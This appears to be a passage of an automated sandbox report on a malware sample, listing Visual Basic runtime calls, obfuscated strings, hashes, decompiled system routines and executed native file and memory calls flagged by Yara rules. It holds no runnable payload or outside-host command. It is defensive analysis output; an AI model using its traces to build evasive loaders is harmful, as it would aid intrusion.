                  • String ID: 16:16:16$Bfferne$Digitalkamera$Formaliaernes9$Scapularies$Unregenerable1$ltA
                  • API String ID: 2918757743-1695909465
                  • Opcode ID: b4f3c23508cea1117cc781f076279afd94a8a56ad6df221dbedf81f70b33a930
                  • Instruction ID: 3806a95896f8153a6f56456eff5a9f23e8b0e5f2b5942c0e8807afdb81e572b9
                  • Opcode Fuzzy Hash: b4f3c23508cea1117cc781f076279afd94a8a56ad6df221dbedf81f70b33a930
                  • Instruction Fuzzy Hash: ADB10974900219EFDB14DFA0DE48BDDBBB4BF48705F1081A9E50AB72A0DB745A89CF58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __vbaStrCopy.MSVBVM60 ref: 0041508E
                  • __vbaVarDup.MSVBVM60 ref: 004150AD
                  • #617.MSVBVM60(?,?,0000006C), ref: 004150BD
                  • __vbaVarTstGt.MSVBVM60(?,?), ref: 004150D9
                  • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 004150F2
                  • #611.MSVBVM60 ref: 004150FC
                  • __vbaStrMove.MSVBVM60 ref: 0041510D
                  • __vbaVarDup.MSVBVM60 ref: 00415123
                  • #518.MSVBVM60(?,?), ref: 00415131
                  • __vbaStrVarMove.MSVBVM60(?), ref: 0041513B
                  • __vbaStrMove.MSVBVM60 ref: 00415146
                  • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00415152
                  • #610.MSVBVM60(?), ref: 00415163
                  • __vbaStrVarVal.MSVBVM60(?,?), ref: 00415171
                  • #540.MSVBVM60(?,00000000), ref: 0041517C
                  • _adj_fdiv_m64.MSVBVM60 ref: 004151A5
                  • _adj_fdiv_m64.MSVBVM60(00000008,?), ref: 004151D6
                  • __vbaVarTstGe.MSVBVM60(00000008,?), ref: 004151E8
                  • __vbaFreeStr.MSVBVM60 ref: 004151F8
                  • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00415208
                  • __vbaNew2.MSVBVM60(004029E8,0041746C), ref: 0041522C
                  • __vbaHresultCheckObj.MSVBVM60(00000000,0295EA6C,004029D8,00000014), ref: 00415251
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004029F8,00000140), ref: 0041527E
                  • __vbaFreeObj.MSVBVM60 ref: 00415298
                  • #539.MSVBVM60(?,000000D7,000000D9,000000F9), ref: 004152B1
                  • __vbaStrVarMove.MSVBVM60(?), ref: 004152BB
                  • __vbaStrMove.MSVBVM60 ref: 004152C6
                  • __vbaFreeVar.MSVBVM60 ref: 004152CB
                  • __vbaVarDup.MSVBVM60 ref: 004152E5
                  • #645.MSVBVM60(?,00000000), ref: 004152F0
                  • __vbaStrMove.MSVBVM60 ref: 004152FB
                  • __vbaFreeVar.MSVBVM60 ref: 00415300
                  • __vbaFreeStr.MSVBVM60(00415362), ref: 00415350
                  • __vbaFreeStr.MSVBVM60 ref: 00415355
                  • __vbaFreeStr.MSVBVM60 ref: 0041535A
                  • __vbaFreeStr.MSVBVM60 ref: 0041535F
                  Strings
                  Memory Dump Source
                  • Source File: 0000000F.00000001.507154861.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: __vba$Free$Move$List$CheckHresult_adj_fdiv_m64$#518#539#540#610#611#617#645CopyNew2
                  • String ID: DELIKATESSER$Dorsally4$Kielbasa4$disinhabit
                  • API String ID: 1529234513-2571534993
                  • Opcode ID: 4bc5372a1db0a8b17610c9feecec8e73afd5386ded283a3b95bc48e361337743
                  • Instruction ID: d0022da710132c39d04a457d4db14dc12b6dad0a9a363c05a2efa2b7a27b2b3c
                  • Opcode Fuzzy Hash: 4bc5372a1db0a8b17610c9feecec8e73afd5386ded283a3b95bc48e361337743
                  • Instruction Fuzzy Hash: 53912971D00229DBCB05DFE4DD88AEEBB78FB48704F10812AE506B72A0DB745949CF99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __vbaVarDup.MSVBVM60 ref: 00415E4E
                  • #667.MSVBVM60(?), ref: 00415E54
                  • __vbaVarDup.MSVBVM60 ref: 00415E79
                  • #666.MSVBVM60(?,?), ref: 00415E83
                  • __vbaInStrVar.MSVBVM60(?,00000000,?,?,00000028), ref: 00415EAC
                  • __vbaVarTstGe.MSVBVM60(00008002,00000000), ref: 00415EBA
                  • __vbaFreeVarList.MSVBVM60(00000005,?,?,?,?,?), ref: 00415ED9
                  • __vbaVarDup.MSVBVM60 ref: 00415F04
                  • #619.MSVBVM60(?,?,000000A6), ref: 00415F13
                  • __vbaStrVarMove.MSVBVM60(?), ref: 00415F1D
                  • __vbaStrMove.MSVBVM60 ref: 00415F28
                  • __vbaStrCopy.MSVBVM60 ref: 00415F39
                  • __vbaFreeStr.MSVBVM60 ref: 00415F42
                  • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00415F52
                  • __vbaNew2.MSVBVM60(004029E8,0041746C), ref: 00415F6E
                  • __vbaHresultCheckObj.MSVBVM60(00000000,0295EA6C,004029D8,00000014), ref: 00415F93
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004029F8,000000F0), ref: 00415FBD
                  • __vbaStrMove.MSVBVM60 ref: 00415FD0
                  • __vbaFreeObj.MSVBVM60 ref: 00415FD9
                  • __vbaFreeStr.MSVBVM60(0041604C), ref: 00416045
                  Strings
                  Memory Dump Source
                  • Source File: 0000000F.00000001.507154861.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: __vba$Free$Move$CheckHresultList$#619#666#667CopyNew2
                  • String ID: $r$(j$Haandstrgen5$userprofile$windir
                  • API String ID: 877882336-2823200559
                  • Opcode ID: f45f4e24723edc4068a1049ce70ab0f59df7876e7cf46888b94df6565a318252
                  • Instruction ID: cad36525ac23c74db11152aae2b8d1b6b0405709c4632bd15e99b0f78d374049
                  • Opcode Fuzzy Hash: f45f4e24723edc4068a1049ce70ab0f59df7876e7cf46888b94df6565a318252
                  • Instruction Fuzzy Hash: BCB10771900219EFCB14DFA4DD89AEEBBB8FB48700F10816AF505B72A0DB745949CF95
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __vbaStrCopy.MSVBVM60(?,660E6C30,660E1929), ref: 00414E68
                  • #709.MSVBVM60(Lionisables5,renummererer,000000FF,00000000), ref: 00414E7B
                  • #525.MSVBVM60(00000090), ref: 00414E8B
                  • __vbaStrMove.MSVBVM60 ref: 00414E9C
                  • #512.MSVBVM60(SIKSAKKENDES,00000063), ref: 00414EA5
                  • __vbaStrMove.MSVBVM60 ref: 00414EB0
                  • #523.MSVBVM60(valkeler), ref: 00414EBF
                  • __vbaStrMove.MSVBVM60 ref: 00414ECA
                  • #629.MSVBVM60(?,?,000000B4,?), ref: 00414EFB
                  • __vbaVarTstNe.MSVBVM60(?,?), ref: 00414F1D
                  • __vbaFreeStr.MSVBVM60 ref: 00414F2E
                  • __vbaFreeVarList.MSVBVM60(00000003,00000008,00000002,?), ref: 00414F3E
                  • __vbaVarDup.MSVBVM60 ref: 00414F60
                  • #522.MSVBVM60(00000002,00000008), ref: 00414F6E
                  • __vbaStrVarMove.MSVBVM60(00000002), ref: 00414F78
                  • __vbaStrMove.MSVBVM60 ref: 00414F83
                  • __vbaFreeVarList.MSVBVM60(00000002,00000008,00000002), ref: 00414F8F
                  • #527.MSVBVM60(JURYLESS), ref: 00414F9D
                  • __vbaStrMove.MSVBVM60 ref: 00414FA8
                  • __vbaStrCopy.MSVBVM60 ref: 00414FB5
                  • __vbaFreeStr.MSVBVM60 ref: 00414FBE
                  • __vbaFreeStr.MSVBVM60(0041500E), ref: 00414FFC
                  • __vbaFreeStr.MSVBVM60 ref: 00415001
                  • __vbaFreeStr.MSVBVM60 ref: 00415006
                  • __vbaFreeStr.MSVBVM60 ref: 0041500B
                  Strings
                  Memory Dump Source
                  • Source File: 0000000F.00000001.507154861.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: __vba$Free$Move$CopyList$#512#522#523#525#527#629#709
                  • String ID: JURYLESS$Lionisables5$PHONOCARDIOGRAMME$SIKSAKKENDES$Unstaggered6$renummererer$valkeler
                  • API String ID: 3254860574-4034370320
                  • Opcode ID: 9a4bab6e89ed57f8dc014a9e9b5e42676cfd5e510e7dcdda485c2f2765933c94
                  • Instruction ID: 3ab4bd34e4038f1b6151edb9d35dad6ec0f5961beff2406b33e8d1207b77bc06
                  • Opcode Fuzzy Hash: 9a4bab6e89ed57f8dc014a9e9b5e42676cfd5e510e7dcdda485c2f2765933c94
                  • Instruction Fuzzy Hash: A651E875D002499BDB04DFD4DD89ADEBFB8BF58300F10412AE506B72A4DBB41689CFA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • #652.MSVBVM60(?,?,66106831,660E6C30,660E1929), ref: 00414AF8
                  • __vbaVarTstEq.MSVBVM60(?,?), ref: 00414B14
                  • __vbaFreeVarList.MSVBVM60(00000002,00000002,?), ref: 00414B27
                  • #539.MSVBVM60(00000002,0000008F,00000086,00000007), ref: 00414B4B
                  • __vbaStrVarMove.MSVBVM60(00000002), ref: 00414B55
                  • __vbaStrMove.MSVBVM60 ref: 00414B5C
                  • __vbaStrCopy.MSVBVM60 ref: 00414B66
                  • __vbaFreeStr.MSVBVM60 ref: 00414B6F
                  • __vbaFreeVar.MSVBVM60 ref: 00414B74
                  • __vbaVarDup.MSVBVM60 ref: 00414B8E
                  • #666.MSVBVM60(?,00000002), ref: 00414B9C
                  • __vbaVarCat.MSVBVM60(?,00008008,?), ref: 00414BBC
                  • __vbaStrVarMove.MSVBVM60(00000000), ref: 00414BC3
                  • __vbaStrMove.MSVBVM60 ref: 00414BCA
                  • __vbaFileOpen.MSVBVM60(00000020,000000FF,00000001,00000000), ref: 00414BD3
                  • __vbaFreeStr.MSVBVM60 ref: 00414BDC
                  • __vbaFreeVarList.MSVBVM60(00000003,00000002,?,?), ref: 00414BEC
                  • #611.MSVBVM60 ref: 00414BF5
                  • __vbaStrMove.MSVBVM60 ref: 00414C00
                  • __vbaPut3.MSVBVM60(00000000,?,00000001), ref: 00414C0A
                  • __vbaFreeStr.MSVBVM60 ref: 00414C13
                  • __vbaFileClose.MSVBVM60(00000001), ref: 00414C17
                  Strings
                  Memory Dump Source
                  • Source File: 0000000F.00000001.507154861.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: __vba$Free$Move$FileList$#539#611#652#666CloseCopyOpenPut3
                  • String ID: Rebukeful4$\TUN5jvHxLZYIkcVn6S8g8Zy7vgIRN6j34$tmp
                  • API String ID: 1642154090-2505050908
                  • Opcode ID: fea7da68f66a83f01a54455ec8a34ee24f470dbb18a356f4324886dd26b7fb61
                  • Instruction ID: db7d2b6c2fd00e66f80999167363a440dad08cd3fdb0f31befbf95a8ee7b4795
                  • Opcode Fuzzy Hash: fea7da68f66a83f01a54455ec8a34ee24f470dbb18a356f4324886dd26b7fb61
                  • Instruction Fuzzy Hash: C851EDB1D002099FDB04DFA4D948ADEBBB8FF48704F10C12AE616B72A0EB745549CF65
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000F.00000001.507154861.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: __vba$FreeMove$#520CopyList$ErrorOverflow
                  • String ID: GRADEREDE$Turkess9
                  • API String ID: 2203838927-1635620145
                  • Opcode ID: f922caacb578ad27f238f49bf2f18ba6fbafca460e03e33c49d96f222ced262d
                  • Instruction ID: 6b1be014e87011149bd0f186f78072c4e5c91de26541e0d2c19a23d7535a914c
                  • Opcode Fuzzy Hash: f922caacb578ad27f238f49bf2f18ba6fbafca460e03e33c49d96f222ced262d
                  • Instruction Fuzzy Hash: 6551E9B1D00209EBDB04DFA4D989ADEBFB8FF08740F14412AE506B7290E7749589CBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __vbaStrCopy.MSVBVM60 ref: 004157FF
                  • #598.MSVBVM60 ref: 00415801
                  • #519.MSVBVM60(KUVERTEN), ref: 0041580C
                  • __vbaStrMove.MSVBVM60 ref: 0041581D
                  • __vbaStrMove.MSVBVM60(000000F2,?), ref: 0041583F
                  • #631.MSVBVM60(00000000), ref: 00415842
                  • #528.MSVBVM60(?,?), ref: 0041585A
                  • #520.MSVBVM60(?,?), ref: 00415868
                  • __vbaStrVarMove.MSVBVM60(?), ref: 00415872
                  • __vbaStrMove.MSVBVM60 ref: 0041587D
                  • __vbaStrCopy.MSVBVM60 ref: 0041588A
                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0041589A
                  • __vbaFreeVarList.MSVBVM60(00000004,00000002,00000008,?,?), ref: 004158B2
                  • __vbaFreeStr.MSVBVM60(004158FC), ref: 004158F5
                  Strings
                  Memory Dump Source
                  • Source File: 0000000F.00000001.507154861.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: __vba$Move$Free$CopyList$#519#520#528#598#631
                  • String ID: 2$KUVERTEN
                  • API String ID: 860267153-160717622
                  • Opcode ID: 123c800655cb1eca3d9d214644a12ee5cb0d15e97495fcd629df4a15f09c58eb
                  • Instruction ID: 04481c4492307c2e4da7a75cfd4f4fa401a31a651229871e0efee2cbbbd0db22
                  • Opcode Fuzzy Hash: 123c800655cb1eca3d9d214644a12ee5cb0d15e97495fcd629df4a15f09c58eb
                  • Instruction Fuzzy Hash: 5F31D6B1C10229EFCB04DFD4DD89AEEBBB8FB58700F10412AE506B7660DB745649CBA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __vbaVarDup.MSVBVM60(660E6BEC,660E6C30,660E1929), ref: 00414D03
                  • #607.MSVBVM60(?,00000064,?), ref: 00414D13
                  • __vbaStrVarMove.MSVBVM60(?), ref: 00414D1D
                  • __vbaStrMove.MSVBVM60 ref: 00414D24
                  • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00414D30
                  • #709.MSVBVM60(Shammock6,Amerindians9,000000FF,00000000), ref: 00414D47
                  • #525.MSVBVM60(0000004C), ref: 00414D54
                  • __vbaStrMove.MSVBVM60 ref: 00414D5F
                  • #512.MSVBVM60(Eneboerskens,00000090), ref: 00414D6B
                  • __vbaStrMove.MSVBVM60 ref: 00414D76
                  • __vbaStrCopy.MSVBVM60 ref: 00414D7D
                  • __vbaFreeStr.MSVBVM60 ref: 00414D86
                  • #586.MSVBVM60(00000000,403B0000), ref: 00414D93
                  • __vbaFreeStr.MSVBVM60(00414DE6,660E6BEC,660E6C30,660E1929), ref: 00414DDE
                  • __vbaFreeStr.MSVBVM60 ref: 00414DE3
                  Strings
                  Memory Dump Source
                  • Source File: 0000000F.00000001.507154861.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: __vba$FreeMove$#512#525#586#607#709CopyList
                  • String ID: Amerindians9$Eneboerskens$Shammock6
                  • API String ID: 1315283285-3851144993
                  • Opcode ID: c9dd4a38ba157faaa47100beacb548a53905960dac2a79cc83deab82bf41e1f7
                  • Instruction ID: 47d39b2c0a556e7bda706f640f223120ad4fb53459ba33679d4ace5d1b409952
                  • Opcode Fuzzy Hash: c9dd4a38ba157faaa47100beacb548a53905960dac2a79cc83deab82bf41e1f7
                  • Instruction Fuzzy Hash: C2315070E00209EFC714DFA4DA49BDEBBB4BB48300F10812AE516B36A0EB746545CF99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __vbaStrCopy.MSVBVM60(66106DF6,00000000,00000008), ref: 004160BD
                  • __vbaNew2.MSVBVM60(004029E8,0041746C), ref: 004160D5
                  • __vbaHresultCheckObj.MSVBVM60(00000000,0295EA6C,004029D8,0000004C), ref: 004160FA
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402E68,00000028), ref: 0041611A
                  • __vbaFreeObj.MSVBVM60 ref: 00416123
                  • #610.MSVBVM60(?), ref: 0041612D
                  • #552.MSVBVM60(?,?,00000001), ref: 0041613D
                  • __vbaVarMove.MSVBVM60 ref: 0041614F
                  • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041615F
                  • __vbaFreeStr.MSVBVM60(0041619D), ref: 00416196
                  Strings
                  Memory Dump Source
                  • Source File: 0000000F.00000001.507154861.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: __vba$Free$CheckHresult$#552#610CopyListMoveNew2
                  • String ID: (j
                  • API String ID: 3895108431-2984457235
                  • Opcode ID: 50359d3aede29a9258f2cfe025930269be6902b3e7c9ff1c2784c1a9d9bcee1f
                  • Instruction ID: 387e478afc37953dee3ba1256613bb58365750a7dad4cec7652f5c879b654742
                  • Opcode Fuzzy Hash: 50359d3aede29a9258f2cfe025930269be6902b3e7c9ff1c2784c1a9d9bcee1f
                  • Instruction Fuzzy Hash: D5313E71D40205ABCB04DFA5DD49EEEBBB8EF58701F10802AF511B72A0D7786549CF99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 26%
                  			E1EAF645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
                  				signed int _v8;
                  				void* _v36;
                  				intOrPtr _v48;
                  				intOrPtr _v52;
                  				intOrPtr _v56;
                  				char _v60;
                  				char _v64;
                  				intOrPtr _v68;
                  				intOrPtr _v72;
                  				intOrPtr _v76;
                  				intOrPtr _v80;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				intOrPtr _t48;
                  				intOrPtr _t49;
                  				intOrPtr _t50;
                  				intOrPtr* _t52;
                  				char _t56;
                  				void* _t69;
                  				char _t72;
                  				void* _t73;
                  				intOrPtr _t75;
                  				intOrPtr _t79;
                  				void* _t82;
                  				void* _t84;
                  				intOrPtr _t86;
                  				void* _t88;
                  				signed int _t90;
                  				signed int _t92;
                  				signed int _t93;
                  
                  				_t80 = __edx;
                  				_t92 = (_t90 & 0xfffffff8) - 0x4c;
                  				_v8 =  *0x1ebbd360 ^ _t92;
                  				_t72 = 0;
                  				_v72 = __edx;
                  				_t82 = __ecx;
                  				_t86 =  *((intOrPtr*)(__edx + 0xc8));
                  				_v68 = _t86;
                  				E1EB0FA60( &_v60, 0, 0x30);
                  				_t48 =  *((intOrPtr*)(_t82 + 0x70));
                  				_t93 = _t92 + 0xc;
                  				_v76 = _t48;
                  				_t49 = _t48;
                  				if(_t49 == 0) {
                  					_push(5);
                  					 *((char*)(_t82 + 0x6a)) = 0;
                  					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
                  					goto L3;
                  				} else {
                  					_t69 = _t49 - 1;
                  					if(_t69 != 0) {
                  						if(_t69 == 1) {
                  							_push(0xa);
                  							goto L3;
                  						} else {
                  							_t56 = 0;
                  						}
                  					} else {
                  						_push(4);
                  						L3:
                  						_pop(_t50);
                  						_v80 = _t50;
                  						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
                  							E1EAE2280(_t50, _t86 + 0x1c);
                  							_t79 = _v72;
                  							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                  							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
                  							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
                  							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
                  							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
                  							E1EADFFB0(_t72, _t82, _t86 + 0x1c);
                  						}
                  						_t75 = _v80;
                  						_t52 =  *((intOrPtr*)(_v72 + 0x20));
                  						_t80 =  *_t52;
                  						_v72 =  *((intOrPtr*)(_t52 + 4));
                  						_v52 =  *((intOrPtr*)(_t82 + 0x68));
                  						_v60 = 0x30;
                  						_v56 = _t75;
                  						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
                  						asm("movsd");
                  						_v76 = _t80;
                  						_v64 = 0x30;
                  						asm("movsd");
                  						asm("movsd");
                  						asm("movsd");
                  						if(_t80 != 0) {
                  							 *0x1ebbb1e0(_t75, _v72,  &_v64,  &_v60);
                  							_t72 = _v76();
                  						}
                  						_t56 = _t72;
                  					}
                  				}
                  				_pop(_t84);
                  				_pop(_t88);
                  				_pop(_t73);
                  				return E1EB0B640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
                  			}

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, Offset: 1EAA0000, based on PE: true
                  • Associated: 0000000F.00000002.790535754.000000001EBBB000.00000040.00000001.sdmp
                  • Associated: 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp
                  Similarity
                  • API ID: DebugPrintTimes
                  • String ID: 0$0
                  • API String ID: 3446177414-203156872
                  • Opcode ID: 89d86f3caa8b22eff3e3774be82ef6f6d76c6f4924cc7115e2f5471372598379
                  • Instruction ID: db8154aa213e10925e9883adea4d253a0c18e3bdf78601f324b20ec92920cf9c
                  • Opcode Fuzzy Hash: 89d86f3caa8b22eff3e3774be82ef6f6d76c6f4924cc7115e2f5471372598379
                  • Instruction Fuzzy Hash: 2B4137B16087469FC300CF28C584A1ABBE5FB89714F144A6EF988DB301D731EA45CB9A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 53%
                  			E1EB5FDDA(intOrPtr* __edx, intOrPtr _a4) {
                  				void* _t7;
                  				intOrPtr _t9;
                  				intOrPtr _t10;
                  				intOrPtr* _t12;
                  				intOrPtr* _t13;
                  				intOrPtr _t14;
                  				intOrPtr* _t15;
                  
                  				_t13 = __edx;
                  				_push(_a4);
                  				_t14 =  *[fs:0x18];
                  				_t15 = _t12;
                  				_t7 = E1EB0CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                  				_push(_t13);
                  				E1EB55720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                  				_t9 =  *_t15;
                  				if(_t9 == 0xffffffff) {
                  					_t10 = 0;
                  				} else {
                  					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                  				}
                  				_push(_t10);
                  				_push(_t15);
                  				_push( *((intOrPtr*)(_t15 + 0xc)));
                  				_push( *((intOrPtr*)(_t14 + 0x24)));
                  				return E1EB55720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                  			}

                  APIs
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1EB5FDFA
                  Strings
                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 1EB5FE2B
                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 1EB5FE01
                  Memory Dump Source
                  • Source File: 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, Offset: 1EAA0000, based on PE: true
                  • Associated: 0000000F.00000002.790535754.000000001EBBB000.00000040.00000001.sdmp
                  • Associated: 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                  • API String ID: 885266447-3903918235
                  • Opcode ID: 1c9cf106ec0ea38eaeeda4599ff66bb02d20ff6ea94719bd1c744c69dde5619b
                  • Instruction ID: e4e207875edaaae408015073879bf8233d815206365793df867200454ebd967f
                  • Opcode Fuzzy Hash: 1c9cf106ec0ea38eaeeda4599ff66bb02d20ff6ea94719bd1c744c69dde5619b
                  • Instruction Fuzzy Hash: 6CF0F636500141BFD6200A45DC01F63BF6EEF44730F240355F628563D1DB62F86086F4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Executed Functions

                  APIs
                  • NtCreateFile.NTDLL(00000060,00000000,.z`,02D33BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02D33BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02D3861D
                  • NtReadFile.NTDLL(02D33D62,5E972F65,FFFFFFFF,02D33A21,?,?,02D33D62,?,02D33A21,FFFFFFFF,5E972F65,02D33D62,?,00000000), ref: 02D386C5
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: File$CreateRead
                  • String ID: .z`
                  • API String ID: 3388366904-1441809116
                  • Opcode ID: 6ad7e9cab970f7fbbddcd5f0cbfa2ef953f865721da482d78c9190ff49d4b664
                  • Instruction ID: ac898462af4463453aaa8e7dc36b1322a443ec7f1beebff9474023548376b2ef
                  • Opcode Fuzzy Hash: 6ad7e9cab970f7fbbddcd5f0cbfa2ef953f865721da482d78c9190ff49d4b664
                  • Instruction Fuzzy Hash: 3701F6B2200208ABDB18DF88DC84DEB77ADEF8C754F018249BE4DA3241C630E811CBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtCreateFile.NTDLL(00000060,00000000,.z`,02D33BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02D33BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02D3861D
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: CreateFile
                  • String ID: .z`
                  • API String ID: 823142352-1441809116
                  • Opcode ID: 5f1245bfb85d33be96fa6dad0c9d9f0a282bfa7797d1d64eb9a00cb5b9b62ead
                  • Instruction ID: 80425a87e26289f3265c3119eb9de79771c88136f279fd36c605ec98af9768d0
                  • Opcode Fuzzy Hash: 5f1245bfb85d33be96fa6dad0c9d9f0a282bfa7797d1d64eb9a00cb5b9b62ead
                  • Instruction Fuzzy Hash: B301B6B2201208ABCB08CF88DC95DEB77A9EF8C754F158248FA1DA7240C630EC11CBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtCreateFile.NTDLL(00000060,00000000,.z`,02D33BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02D33BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02D3861D
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: CreateFile
                  • String ID: .z`
                  • API String ID: 823142352-1441809116
                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                  • Instruction ID: 18062587e4bddab514d0d2e3fa7cf46e035486ec94e013ff7292d915ff858297
                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                  • Instruction Fuzzy Hash: F0F0B2B2201208ABCB08CF88DC94EEB77ADAF8C754F158248BA0D97240C630E811CBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtCreateFile.NTDLL(00000060,00000000,.z`,02D33BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02D33BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02D3861D
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: CreateFile
                  • String ID: .z`
                  • API String ID: 823142352-1441809116
                  • Opcode ID: 96e53d9f532eff4e48bee81213216dacc8a9c0eae155110fb7375bb39e440366
                  • Instruction ID: 2c48a997f34b38f4ca18fe4a08d5df8300d93109da6c2ae6ca6058a80c080cd1
                  • Opcode Fuzzy Hash: 96e53d9f532eff4e48bee81213216dacc8a9c0eae155110fb7375bb39e440366
                  • Instruction Fuzzy Hash: 36F0F8B2604149AFCB15CFACD994DDB77BAEF8C300B148649FA8CC7204C631E855CBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtReadFile.NTDLL(02D33D62,5E972F65,FFFFFFFF,02D33A21,?,?,02D33D62,?,02D33A21,FFFFFFFF,5E972F65,02D33D62,?,00000000), ref: 02D386C5
                  Memory Dump Source
                  • Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: FileRead
                  • String ID:
                  • API String ID: 2738559852-0
                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                  • Instruction ID: ff768ef484a2d61da5e866d2b640dcc9cf247528c67f6c5cb67f937ba337f711
                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                  • Instruction Fuzzy Hash: D4F0A9B2200108ABCB14DF89DC94DEB77ADEF8C754F158248BE1D97241D630E811CBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02D22D11,00002000,00003000,00000004), ref: 02D387E9
                  Memory Dump Source
                  • Source File: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false
                  Yara matches
                  Similarity
                  • API ID: AllocateMemoryVirtual
                  • String ID:
                  • API String ID: 2167126740-0
                  • Opcode ID: c6ba5b996d80282ef4d40e939a3623e0c582f228b3eefefef00f5a8c6f0c3eb5
